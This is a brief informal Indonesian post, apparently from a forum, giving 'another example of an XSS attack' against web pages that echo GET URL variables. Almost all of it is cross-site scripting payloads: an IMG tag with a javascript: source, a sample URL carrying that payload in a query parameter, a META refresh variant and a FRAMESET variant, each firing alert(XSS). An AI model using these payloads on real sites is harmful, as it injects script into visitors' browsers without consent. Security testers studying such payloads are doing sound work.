contoh lain serangan XSS !!!
jika hlaman web lu mengijinkan echo melalui var GET URL
dengan ini kamu bisa make model XSS lainna:
<IMG SRC=javascript:alert(XSS);>
eksperimen url:
http://domain.com/page=4&display=<IMG SRC=javascript:alert(XSS);>
sample lainna:
<META HTTP-EQUIV=refresh CONTENT=0; URL=http://;URL=javascript:alert(XSS);>
<FRAMESET><FRAME SRC=javascript:alert(XSS);></FRAMESET>